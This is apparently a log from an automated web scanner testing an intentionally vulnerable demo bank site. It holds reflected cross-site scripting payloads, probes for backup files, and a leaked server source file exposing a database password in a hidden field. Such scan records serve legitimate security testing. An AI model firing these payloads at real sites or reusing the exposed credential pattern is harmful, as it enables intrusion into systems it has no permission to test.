<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /include/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:10 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 48
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=</textarea><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 975
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was </textarea><script>alert('XSS')</script><br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= </textarea><script>alert('XSS')</script><br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 48
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:49 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3974
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /cgi-bin/mailfile.cgi HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:41:59 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:02 GMT
ETag: "b4c3f1f8a9dc11:8f6"
Content-Length: 12
MAILFILE.CGIGET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=>"><script>alert("XSS")</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3982
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>>"><script>alert("XSS")</script></center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /login.asp.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:51:33 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 05:45:31 GMT
ETag: "96256f86badc11:8f6"
Content-Length: 14611
<%
dim sName, sPassPhrase
sName=Request("txtName")
sPassPhrase=Request("txtPassPhrase")
%>
<html>
<body>
<%
if lcase(sName)="root" then
Response.Write "Hello " & sName & "<br>Welcome back"
elseif lcase(sName)="/etc/passwd" then
Response.Write "root:x:0:0::/root:/bin/sh"
Response.Write "dsmith:x:516:522::/home/dsmith:/bin/false"
Response.Write "etaylor:x:517:523::/home/etaylor:/bin/false"
Response.Write "scooby:x:518:524::/home/scooby-doo:/bin/false"
Response.Write "pshaggy:x:519:526::/home/pshaggy:/bin/false"
Response.Write "dtomson:x:520:527::/home/dtomson:/bin/false"
Response.Write "jsmith:x:521:528::/home/jsmith:/bin/false"
elseif lcase(sName)="/boot.ini" then
Response.Write "[boot loader]"
Response.Write "timeout=30"
Response.Write "default=multi(0)disk(0)rdisk(0)partition(3)\WINNT"
Response.Write "[operating systems]"
Response.Write "multi(0)disk(0)rdisk(0)partition(3)\WINNT=""Microsoft Windows 2000 Server"" /fastdetect"
Response.Write "multi(0)disk(0)rdisk(0)partition(2)\WINNT=""Microsoft Windows 2000 Professional"" /fastdetect"
elseif lcase(sName)="*" then
Response.Write "An error has occurred"
elseif lcase(sName)=";" then
Response.Write "NON-HTML ERROR"
else
Response.Write " <TABLE BGCOLOR='#ffffff' STYLE='border: 3px solid black'> "
Response.Write " <TR> "
Response.Write " <TD "
Response.Write " STYLE='border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3' "
Response.Write " HEIGHT='47' ROWSPAN='2' VALIGN='TOP'><IMG "
Response.Write " SRC='/images/freebank-logo2.gif' ALIGN='LEFT' BORDER='0' WIDTH='150' "
Response.Write " HEIGHT='50'><BR><BR></TD> "
Response.Write " <TD STYLE='border-top: 7px solid #2E7AA3' WIDTH='571' HEIGHT='47' "
Response.Write " VALIGN='TOP'> </TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD WIDTH='571' VALIGN='TOP' ROWSPAN='7' HEIGHT='49'> "
Response.Write " <TABLE> "
Response.Write " <TR> "
Response.Write " <TD BGCOLOR='#2E7AA3' STYLE='border: 1px solid black' WIDTH='258' "
Response.Write " HEIGHT='217'> "
Response.Write " <FORM ACTION='login.asp' METHOD='post'> "
Response.Write " <CENTER>Invalid Login: " & sName & "<br>Please try again<br>" & "Username:<BR><INPUT TYPE='text' NAME='txtName' "
Response.Write " STYLE='border: 1px solid black; spacing: 0'><BR>Password:<BR><INPUT TYPE='password' "
Response.Write " NAME='txtPassPhrase' STYLE='border: 1px solid black; spacing: 0'><BR><INPUT "
Response.Write " TYPE='radio' NAME='graphicOption' VALUE='minimum' CHECKED='CHECKED'><FONT "
Response.Write " SIZE='-1'>Minimum Graphics</FONT><BR><INPUT TYPE='radio' NAME='graphicOption' "
Response.Write " VALUE='standard'><FONT SIZE='-1'>Standard Graphics</FONT><BR><BR><INPUT "
Response.Write " TYPE='submit' STYLE='border: 1px solid black' "
Response.Write " VALUE=' Access Accounts '><BR></CENTER></FORM></TD> "
Response.Write " <TD STYLE='border: 1px solid black' WIDTH='304' HEIGHT='217' "
Response.Write " ROWSPAN='2'><IMG SRC='/images/lock.gif' WIDTH='304' HEIGHT='266' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD BGCOLOR='ffffff' STYLE='border: 1px solid black' WIDTH='258' HEIGHT='241' "
Response.Write " VALIGN='TOP'><FONT SIZE='-2'>We are confident of our system's ability to "
Response.Write " protect all transactions; however, this is not an invitation for people to "
Response.Write " attempt unauthorized access to the system. This is a private computing system "
Response.Write " which is restricted to authorized individuals. Actual or attempted unauthorized "
Response.Write " use of this computer system may result in criminal and/or civil prosecution. We "
Response.Write " reserve the right to view, monitor, and record activity on the system without "
Response.Write " notice or permission. Any information obtained by monitoring, reviewing, or "
Response.Write " recording is subject to review by law enforcement organizations in connection "
Response.Write " with the investigation or prosecution of possible criminal activity on the "
Response.Write " system. If you are not an authorized user of this system or do not consent to "
Response.Write " continued monitoring, exit the system at this time. </FONT></TD> "
Response.Write " </TR> "
Response.Write " </TABLE></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162'><IMG "
Response.Write " SRC='/images/customer-login.gif' ALIGN='LEFT' HEIGHT='20' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162'><A "
Response.Write " HREF='/pindex.asp'><IMG SRC='/images/financial-planning.gif' ALIGN='LEFT' "
Response.Write " BORDER='0' WIDTH='150' HEIGHT='20'></A></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162' "
Response.Write " HEIGHT='19'><IMG SRC='/images/services.gif' ALIGN='LEFT' HEIGHT='20' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162' "
Response.Write " HEIGHT='24'><IMG SRC='/images/your-accounts.gif' ALIGN='LEFT' HEIGHT='20' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162'><IMG "
Response.Write " SRC='/images/customer-support.gif' ALIGN='LEFT' HEIGHT='20' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border-left: 12px solid #2E7AA3' WIDTH='162' "
Response.Write " ALIGN='CENTER'> "
Response.Write " <FORM ACTION='pformresults.asp' METHOD='post'> "
Response.Write " <P><FONT SIZE='-1' FACE='Arial'> Register for an Interest Checking "
Response.Write " Account with FreeBank:</FONT></P> "
Response.Write " <P><FONT SIZE='-1' FACE='Arial'>First Name:</FONT><INPUT "
Response.Write " TYPE='text' NAME='txtFirstName' "
Response.Write " STYLE='border: 1px solid black; spacing: 0'><BR><FONT SIZE='-1' "
Response.Write " FACE='Arial'>Last Name:</FONT><INPUT TYPE='text' NAME='txtLastName' "
Response.Write " STYLE='border: 1px solid black; spacing: 0'><BR> "
Response.Write " <INPUT TYPE='hidden' NAME='txtHidden' VALUE='This was hidden from the user'> "
Response.Write " <INPUT TYPE='hidden' NAME='dbConnectString' "
Response.Write " VALUE='dbCCNumbers;uid=sa;password=scoobydo'> "
Response.Write " <INPUT TYPE='submit' STYLE='border: 1px solid black' "
Response.Write " VALUE='Register'></P></FORM></TD> "
Response.Write " </TR> "
Response.Write " </TABLE> "
' "
end if
%>
</body>
</html>
GET /admin/help.cgi.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:35:16 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:46:59 GMT
ETag: "744b74f7a9dc11:8f6"
Content-Length: 31
<HTML></HTML>bleh exploit :0:0:POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=1"style="background:url(javascript:alert('XSS'))"%20"HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 997
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was 1"style="background:url(javascript:alert('XSS'))" "<br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= 1"style="background:url(javascript:alert('XSS'))" "<br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
GET /plink.asp?a=>"'><img%20src="javascript:alert('XSS')">&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 205
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = >"'><img src="javascript:alert('XSS')"></P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /user/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:37 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /test/test.html HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:42:07 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:06 GMT
ETag: "d81a92fba9dc11:8f6"
Content-Length: 296
<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title> The Test Page </title>
</head>
<body>
<p> LOGIC CHECKS WORKED </p>
<A href="..\images\hi.asp">The welcome page</A><br>
<br>
<A href="..\errors\errors.log">Error logs</A>
</body>
</html>GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:31 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /testing/p1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/pcomboindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 345
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Active Server Pages</font> <font face="Arial" size=2>error 'ASP 0126'</font>
<p>
<font face="Arial" size=2>Include file not found</font>
<p>
<font face="Arial" size=2>/testing/p1.asp</font><font face="Arial" size=2>, line 4</font>
<p>
<font face="Arial" size=2>The include file 'footer.inc' was not found.
</font> GET /_vti_txt/document.URL; HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_txt/
